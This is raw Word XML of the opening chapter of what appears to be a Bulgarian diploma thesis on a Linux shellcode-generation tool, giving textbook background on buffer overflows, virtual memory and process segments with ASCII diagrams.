        <w:t xml:space="preserve"> на буфер. Той е изследван дълго през годините и може да бъде открит дори и в модерните операционни системи като macOS, Linux и Windows. Лошата слава на този пропуск идва от неговия потенциал за експлоатация и факта, че често се ока</w:t>
      </w:r>
      <w:r w:rsidR="00A477A1">
        <w:t>зва мишена за атаки. Съществува огромe</w:t>
      </w:r>
      <w:r w:rsidR="00A477A1">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">н брой </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">злонамерени програми, които ежедневно се опитват да пробият защитите на нашите системи и да получат контрол над </w:t>
      </w:r>
      <w:r w:rsidR="00A477A1">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>тях</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00112660" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">За намирането на този и други пропуски се използват различни инструменти, например msfvenom или Veil-Ordnance. Те се опитват автоматично да генерират малки програми (“shellcode”), които да се възползват от потенциални слабости. Ако експлоатирането е успешно, добронамерена страна може да уведоми </w:t>
      </w:r>
      <w:r w:rsidR="004B2072">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>жертвата</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> и да спомогне за отстраняването на слабостта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F0F40" w:rsidRPr="006F0F40" w:rsidRDefault="00112660" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Такива инструменти са много мощни, но не са без своите проблеми. Главните </w:t>
      </w:r>
      <w:r w:rsidR="00B8642F">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">им недостатъци </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">са </w:t>
      </w:r>
      <w:r w:rsidR="006F0F40">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">неудобното </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>им използване от начинаещи потребители</w:t>
      </w:r>
      <w:r w:rsidR="006F0F40">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F0F40">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">и това, че са трудни за модифициране, въпреки отворения си код. </w:t>
      </w:r>
      <w:r w:rsidR="00BC554D">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>Изначало процесът</w:t>
      </w:r>
      <w:r w:rsidR="001369F1">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve"> на писане на шелкод</w:t>
      </w:r>
      <w:r w:rsidR="00BC554D">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F0F40">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">е </w:t>
      </w:r>
      <w:r w:rsidR="001369F1">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">изключително </w:t>
      </w:r>
      <w:r w:rsidR="00BC554D">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">труден </w:t>
      </w:r>
      <w:r w:rsidR="006F0F40">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidR="001369F1">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>не е необходимо да бъде допълнително усложняван,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC22A1" w:rsidRPr="00112660" w:rsidRDefault="00112660" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Целта на дипломната работа е да се проектира и разработи инструмент за автоматизирано генериране на шелкод за Linux, изходът от който да може да се прилага за проверки на защитни системи и който да</w:t>
      </w:r>
      <w:r w:rsidR="00B8642F">
        <w:t xml:space="preserve"> предоставя </w:t>
      </w:r>
      <w:r w:rsidR="00B8642F" w:rsidRPr="00112660">
        <w:t>гъвкав</w:t>
      </w:r>
      <w:r w:rsidR="00B8642F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B8642F">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidR="00B8642F">
        <w:t xml:space="preserve">лесен за употреба </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>интерфейс.</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112660" w:rsidRPr="00112660" w:rsidRDefault="00112660" w:rsidP="005D2D2A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:hanging="180"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_hkjk1hpp6b44" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="3" w:name="_Toc3540745"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="00396D23">
        <w:lastRenderedPageBreak/>
        <w:t>Първа</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> глава</w:t>
      </w:r>
      <w:r w:rsidR="005D2D2A">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00396D23">
        <w:t>въведение</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> в buffer overflow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="00112660" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Сигурността е много обсъждана тема. Изтичането на данни като тези при Equifax и Google+ показва липсата на всекидневна сигурност и увеличава интереса към оправяне на проблема. Същевременно злонамерени програми (malware) като Petya и WannaCry</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="1"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00112660">
        <w:t xml:space="preserve"> вредят на хора и фирми, често без директна тяхна вина. Дори и потребители, които използват системи известни със своята сигурност, като Linux и macOS, и с добри практики за сигурност, не са защитени от тях. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Причината е множество бъгове при разработката на софтуера, който се изпълнява на всяка една машина. Подобни бъгове  се откриват  и коригират</w:t>
      </w:r>
      <w:r w:rsidR="00B4067A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>всеки ден, като потребителите рядко разбират за процеса. Повечето остават незабелязани или биват отстранени преди да станат опасни. В редки случаи обаче, има грешки, които дълго време остават в сянка, познати като 0-day. Намирането им се е превърнало в игра на котка и мишка - дали разработчици или хакери първи ще намерят проблема.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Количеството уязвимости е толкова голямо, че съществуват проекти за документиране и борба с тях - индекси на чести уязвимости като Common Vulnerabilities and Exposures (CVE) и ExploitDB, доклади за анализ на пейзажа като този на Cisco.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Според доклада за сигурност на Cisco</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="2"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>, buffer overflow (преливане или препълване на буфер) е най-често допусканият бъг, като уязвимости като EternalBlue</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="3"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> са някои от по-известните. Той е познат поне от 90-те години на миналия век и привлича внимание в множество научни трудове, като “Smashing the stack for fun and profit”</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="4"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>. Възпроизвежда се чрез много прост механизъм и обикновено води до системна грешка (exception). В редки случаи обаче, не се проявява по време на работа и потребителите не забелязват проблем. Такива пропуски могат да се използват за неупълномощено или дори отдалечено изпълнение на код. Този риск за сигурността привлича внимание в продължение на много години и вече има разнообразни мерки за предотвратяването му. Въпреки това, проблемът не е напълно решен и грешки на разработчиците все още водят до сериозни последствия.</w:t>
      </w:r>
      <w:bookmarkStart w:id="4" w:name="_i63emt3u3x9a" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00B829C8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_eo25cd65d10s" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="6" w:name="_Ref2190204"/>
      <w:bookmarkStart w:id="7" w:name="_Toc3540746"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>Разпределение на паметта</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00DC3933">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Дефектът е тясно свързан с разпределението на информацията в паметта на един процес. Съвременните операционни системи използват виртуална памет за да предоставят почти цялото адресно пространство на всеки процес, независимо от това къде физически се съхранява информацията. Това е възможно благодарение на модул в процесора за управление на паметта (</w:t>
      </w:r>
      <w:r w:rsidRPr="00604C58">
        <w:t>MMU</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>). Той позволява паметта да бъде разделена на страници и чрез преобразуваща таблица (page table) да се направят връзки от адресите във виртуалната памет към страници в хардуера. Това се случва за всеки един процес и позволява по-прецизен контрол върху фрагментацията на паметта, както и права за достъп.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+               +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|    page 1     |\             ^|    page 3     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+ \           / +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|   unmapped    |  \         /  |               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|               |   \       /   |   unmapped    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+    \-----X\   |               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|    page 2     |\        /  \  |               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+ \      /    \ +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|               |  \    /      v|    page 1     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|               |   \--X----\   +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|   unmapped    |     /      \  |   unmapped    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|               |    /        \ +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|               |   /          v|    page 2     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|               |  /            +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+ /             |   unmapped    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|    page 3     |/              |               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+               +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F56EB">
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="005F56EB">
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="005F56EB">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>: Свързване в преобразуваща таблица</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Поради оптимизационни и исторически причини виртуалната памет е разделена на няколко сегмента, които имат различно предназначение. Основните са text, data, bss, stack и heap</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="5"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">. Има и много други, например </w:t>
      </w:r>
      <w:r w:rsidR="00B4067A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>rodata и символи за дебъгване, но те не оказват влияние на разпределението в паметта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|     stack     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+-------|-------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|       |       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|       |       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|       v       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|       ^       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|       |       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|       |       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+-------|-------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|     heap      |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|     .text     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|     .data     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|     .bss      |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5A50" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00DD0DC6" w:rsidRDefault="00DE5A50" w:rsidP="00DE5A50">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F56EB">
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="005F56EB">
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="005F56EB">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>: Разпределение на сегментите виртуалната памет</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Text </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Може-би най-важният сегмент - в него се съхранява изпълнимият код на процеса. Той се намира в началото на паметта и често е само за четена (read-only), но исторически това не винаги е било така. В него се съдържа входният символ, където за пръв път бива предаден контрол на програмата.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Тук стоят глобалните променливи - информация, която се очаква да бъде четена и писана от постоянно място през целия живот на процеса.</w:t>
      </w:r>
    </w:p>
